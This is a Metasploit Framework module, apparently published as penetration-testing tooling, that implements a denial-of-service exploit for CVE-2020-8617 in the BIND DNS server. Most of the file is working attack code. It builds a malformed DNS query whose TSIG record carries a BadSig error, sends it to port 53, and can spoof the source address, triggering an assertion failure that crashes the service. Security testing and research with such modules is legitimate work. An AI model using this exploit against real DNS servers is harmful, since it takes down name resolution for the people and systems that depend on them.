modules/auxiliary/dos/dns/bind_tsig_badtime.rb from rapid7/metasploit-framework

modules/auxiliary/dos/dns/bind_tsig_badtime.rb
Summary

Maintainability

0 mins
Test Coverage

Issues
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Capture
  include Msf::Auxiliary::UDPScanner
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'BIND TSIG Badtime Query Denial of Service',
        'Description' => %q{
          A logic error in code which checks TSIG validity can be used to
          trigger an assertion failure in tsig.c.
        },
        'Author' => [
          'Tobias Klein',  # Research and Original PoC
          'Shuto Imai',    # msf module author
        ],
        'References' => [
          ['CVE', '2020-8617'],
          ['URL', 'https://gitlab.isc.org/isc-projects/bind9/-/issues/1703'],
          ['URL', 'https://www.trapkit.de/advisories/TKADV2020-002.txt']
        ],
        'DisclosureDate' => '2020-05-19',
        'License' => MSF_LICENSE,
        'DefaultOptions' => { 'ScannerRecvWindow' => 0 },
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options([
      Opt::RPORT(53),
      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']),
    ])

    deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
  end

  def scan_host(ip)
    print_status("Sending packet to #{ip}")
    if datastore['SRC_ADDR']
      scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])
    else
      scanner_send(payload, ip, rport)
    end
  end

  def payload
    query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65
    query << "\x00\x00"  # Flags: 0x0000 Standard query
    query << "\x00\x01"  # Questions: 1
    query << "\x00\x00"  # Answer RRs: 0
    query << "\x00\x00"  # Authority RRs: 0
    query << "\x00\x01"  # Additional RRs: 1

    # Domain Name
    query << get_domain # Random DNS Name
    query << "\x00"      # [End of name]
    query << "\x00\x01"  # Type: A (Host Address) (1)
    query << "\x00\x01"  # Class: IN (0x0001)

    # Additional records. Name
    query << "\x0alocal-ddns"
    query << "\x00"

    query << "\x00\xfa" # Type: TSIG (Transaction Signature) (250)
    query << "\x00\xff" # Class: ANY (0x00ff)
    query << "\x00\x00\x00\x00" # Time to live: 0
    query << "\x00\x1d" # Data length: 29

    # Algorithm Name
    query << "\x0bhmac-sha256" # The algorithm for local-ddns is hmac-sha256
    query << "\x00"

    # Rest of TSIG
    query << "\x00\x00\x00\x00\x00\x00" # Time Signed: Jan  1, 1970 00:00:00.000000000 UTC
    query << "\x00\x00" # Fudge: 0
    query << "\x00\x00" # MAC Size: 0
    query << "\x00\x00" # Original Id: 0
    query << "\x00\x10" # Error: BadSig (16)
    query << "\x00\x00" # Other len: 0
  end

  def get_domain
    domain = "\x06#{Rex::Text.rand_text_alphanumeric(6)}"
    org = "\x03#{Rex::Text.rand_text_alphanumeric(3)}"
    domain + org
  end

end